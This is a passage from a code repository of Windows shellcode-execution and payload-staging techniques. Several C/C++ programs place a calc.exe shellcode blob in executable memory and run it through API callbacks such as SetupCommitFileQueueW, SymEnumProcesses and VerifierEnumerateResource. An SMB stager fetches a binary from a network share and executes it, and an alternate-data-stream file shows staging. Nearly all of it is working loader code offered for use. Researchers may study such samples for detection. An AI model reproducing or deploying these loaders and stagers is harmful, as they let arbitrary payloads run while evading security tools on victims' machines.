"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | 32 | int main() { 33 | 34 | 35 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 36 | memcpy(address, &op[0], sizeof(op)); 37 | 38 | 39 | HSPFILEQ hQueue = ::SetupOpenFileQueue(); 40 | ::SetupQueueCopyW(hQueue, L"c:\\", L"\\windows\\sytem32\\", L"kernel32.dll", NULL, NULL, L"c:\\windows\\temp\\", L"kernel32.dll", SP_COPY_NOSKIP); 41 | ::SetupCommitFileQueueW(::GetTopWindow(NULL), hQueue, (PSP_FILE_CALLBACK_W)address, NULL); 42 | 43 | 44 | return 0; 45 | 46 | } -------------------------------------------------------------------------------- /Shellcode Execution/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/SymEnumProcesses/SymEnumProcesses.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | // Requires Dbghelp.lib 7 | 8 | // alfarom256 calc shellcode 9 | unsigned char op[] = 10 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 11 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 12 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 13 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 14 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 15 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 16 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 17 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 18 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 19 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 20 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 21 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 22 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 23 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 24 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 25 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 26 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 27 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 28 | "\x63\x2e\x65\x78\x65\x00"; 29 | 30 | 31 | 32 | int main() { 33 | 34 | 35 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 36 | ::RtlMoveMemory(addr, op, sizeof(op)); 37 | 38 | ::SymInitialize(::GetCurrentProcess(), NULL, FALSE); 39 | 40 | if (addr) 41 | ::SymEnumProcesses((PSYM_ENUMPROCESSES_CALLBACK) addr, NULL); 42 | 43 | 44 | } -------------------------------------------------------------------------------- /Shellcode Execution/SymEnumProcesses/SymEnumProcesses.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/SymFindFileInPath/SymFindFileInPath.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // requires Dbghelp.lib 5 | #include 6 | #pragma comment(lib, "Dbghelp.lib") 7 | 8 | // alfarom256 calc shellcode 9 | unsigned char op[] = 10 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 11 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 12 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 13 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 14 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 15 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 16 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 17 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 18 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 19 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 20 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 21 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 22 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 23 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 24 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 25 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 26 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 27 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 28 | "\x63\x2e\x65\x78\x65\x00"; 29 | 30 | int main() { 31 | 32 | HANDLE hProcess = ::GetCurrentProcess(); 33 | 34 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 35 | memcpy(address, &op[0], sizeof(op)); 36 | 37 | ::SymInitialize(hProcess, NULL, TRUE); 38 | 39 | SYMSRV_INDEX_INFO finfo; 40 | ::SymSrvGetFileIndexInfo("c:\\windows\\system32\\kernel32.dll", &finfo, NULL); 41 | 42 | char dummy[MAX_PATH]; 43 | 44 | 45 | ::SymFindFileInPath(hProcess, "c:\\windows\\system32", "kernel32.dll", &finfo.timestamp, finfo.size, 0, SSRVOPT_DWORDPTR, dummy, (PFINDFILEINPATHCALLBACK)address, NULL); 46 | 47 | 48 | return 0; 49 | 50 | } -------------------------------------------------------------------------------- /Shellcode Execution/SymFindFileInPath/SymFindFileInPath.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/SysEnumSourceFiles/SysEnumSourceFiles.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // requires Dbghelp.lib 5 | #include 6 | #pragma comment(lib, "Dbghelp.lib") 7 | 8 | // alfarom256 calc shellcode 9 | unsigned char op[] = 10 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 11 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 12 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 13 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 14 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 15 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 16 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 17 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 18 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 19 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 20 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 21 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 22 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 23 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 24 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 25 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 26 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 27 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 28 | "\x63\x2e\x65\x78\x65\x00"; 29 | 30 | int main() { 31 | 32 | 33 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 34 | memcpy(address, &op[0], sizeof(op)); 35 | 36 | ::SymInitialize(::GetCurrentProcess(), NULL, TRUE); 37 | 38 | ::SymEnumSourceFiles(::GetCurrentProcess(), NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACK)address, NULL); 39 | 40 | 41 | } -------------------------------------------------------------------------------- /Shellcode Execution/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/VerifierEnumerateResource/VerifierEnumerateResource.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | typedef ULONG(WINAPI* VerifierEnumResourceFn)( 6 | HANDLE Process, 7 | ULONG Flags, 8 | ULONG ResourceType, 9 | AVRF_RESOURCE_ENUMERATE_CALLBACK ResourceCallback, 10 | PVOID EnumerationContext 11 | ); 12 | 13 | // alfarom256 calc shellcode 14 | unsigned char op[] = 15 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 16 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 17 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 18 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 19 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 20 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 21 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 22 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 23 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 24 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 25 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 26 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 27 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 28 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 29 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 30 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 31 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 33 | "\x63\x2e\x65\x78\x65\x00"; 34 | 35 | 36 | 37 | int main() { 38 | 39 | 40 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 41 | ::RtlMoveMemory(addr, op, sizeof(op)); 42 | 43 | HMODULE lib = LoadLibraryW(L"verifier.dll"); 44 | 45 | VerifierEnumResourceFn VerifierEnumResource; 46 | 47 | *(FARPROC*)&VerifierEnumResource = GetProcAddress(lib,"VerifierEnumerateResource"); 48 | 49 | if (NULL == VerifierEnumResource) 50 | { 51 | printf("could not find entry point %s in verifier.dll\n", 52 | "VerifierEnumerateResource"); 53 | return GetLastError(); 54 | } 55 | 56 | VerifierEnumResource(::GetCurrentProcess(), NULL, AvrfResourceHeapAllocation, (AVRF_RESOURCE_ENUMERATE_CALLBACK)addr, NULL); 57 | 58 | } -------------------------------------------------------------------------------- /Shellcode Execution/VerifierEnumerateResource/VerifierEnumerateResource.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Staging Techniques/ADS_Stage.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void writeToADS(const char* fileName, const char* streamName, const char* data) { 6 | char fullPath[MAX_PATH]; 7 | snprintf(fullPath, sizeof(fullPath), "%s:%s", fileName, streamName); 8 | 9 | FILE* file = fopen(fullPath, "wb"); 10 | if (file == NULL) { 11 | fprintf(stderr, "Error opening stream for writing.\n"); 12 | return; 13 | } 14 | 15 | fwrite(data, sizeof(char), strlen(data), file); 16 | fclose(file); 17 | printf("Data written to stream '%s' successfully.\n", streamName); 18 | } 19 | 20 | void readFromADS(const char* fileName, const char* streamName) { 21 | char fullPath[MAX_PATH]; 22 | snprintf(fullPath, sizeof(fullPath), "%s:%s", fileName, streamName); 23 | 24 | FILE* file = fopen(fullPath, "rb"); 25 | if (file == NULL) { 26 | fprintf(stderr, "Error opening stream for reading.\n"); 27 | return; 28 | } 29 | 30 | fseek(file, 0, SEEK_END); 31 | long size = ftell(file); 32 | fseek(file, 0, SEEK_SET); 33 | 34 | char* buffer = (char*)malloc(size + 1); 35 | if (buffer == NULL) { 36 | fprintf(stderr, "Memory allocation error.\n"); 37 | fclose(file); 38 | return; 39 | } 40 | 41 | fread(buffer, sizeof(char), size, file); 42 | buffer[size] = '\0'; // Null-terminate the string 43 | fclose(file); 44 | 45 | printf("Data read from stream '%s':\n%s\n", streamName, buffer); 46 | free(buffer); 47 | } 48 | 49 | int main() { 50 | const char* fileName = "example.txt"; 51 | const char* streamName = "myStream"; 52 | const char* data = "This is some data stored in an alternate data stream."; 53 | 54 | writeToADS(fileName, streamName, data); 55 | 56 | readFromADS(fileName, streamName); 57 | 58 | return 0; 59 | } 60 | -------------------------------------------------------------------------------- /Staging Techniques/Local_Stage.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Global variables 6 | unsigned char* buf = NULL; // Buffer to store file content 7 | DWORD size = 0; // Variable to store file size 8 | 9 | // Function to read binary file 10 | void readBin(const char* fileName) { 11 | FILE* file; 12 | 13 | file = fopen(fileName, "rb"); 14 | if (file == NULL) { 15 | fprintf(stderr, "Error opening file.\n"); 16 | return; 17 | } 18 | 19 | fseek(file, 0, SEEK_END); // Move to end of file 20 | size = ftell(file); // Get file size 21 | fseek(file, 0, SEEK_SET); // Move back to start of file 22 | 23 | buf = (unsigned char*)malloc(size * sizeof(char)); // Allocate memory for file content 24 | if (buf == NULL) { 25 | fprintf(stderr, "Memory allocation error.\n"); 26 | fclose(file); 27 | return; 28 | } 29 | 30 | fread(buf, sizeof(char), size, file); // Read file content into buffer 31 | fclose(file); 32 | 33 | printf("File read successfully. Size: %lu bytes.\n", size); 34 | } 35 | 36 | 37 | int main() { 38 | const char* fileName = "example.bin"; // Specify the binary file to read 39 | readBin(fileName); // Call the function to read the file 40 | 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /Staging Techniques/SMB_Stage.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | unsigned char buf[460] = ""; 5 | 6 | void readBin(const char* fileName){ 7 | FILE *file; 8 | DWORD file_length; 9 | 10 | HANDLE hFile = CreateFileA(fileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 11 | if(hFile == NULL) 12 | { 13 | printf("Error opening file: %d\n", GetLastError()); 14 | exit(-99); 15 | } 16 | 17 | BOOL rez = ReadFile(hFile, &buf, 460, NULL, NULL); 18 | if(rez == FALSE) 19 | { 20 | printf("Error reading file: %d\n", GetLastError()); 21 | exit(-98); 22 | } 23 | } 24 | 25 | int main() 26 | { 27 | LPVOID pAddr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 28 | readBin("\\\\192.168.0.103\\share\\test.bin"); 29 | memcpy(pAddr, buf, sizeof(buf)); 30 | ((void(*)())pAddr)(); 31 | 32 | } --------------------------------------------------------------------------------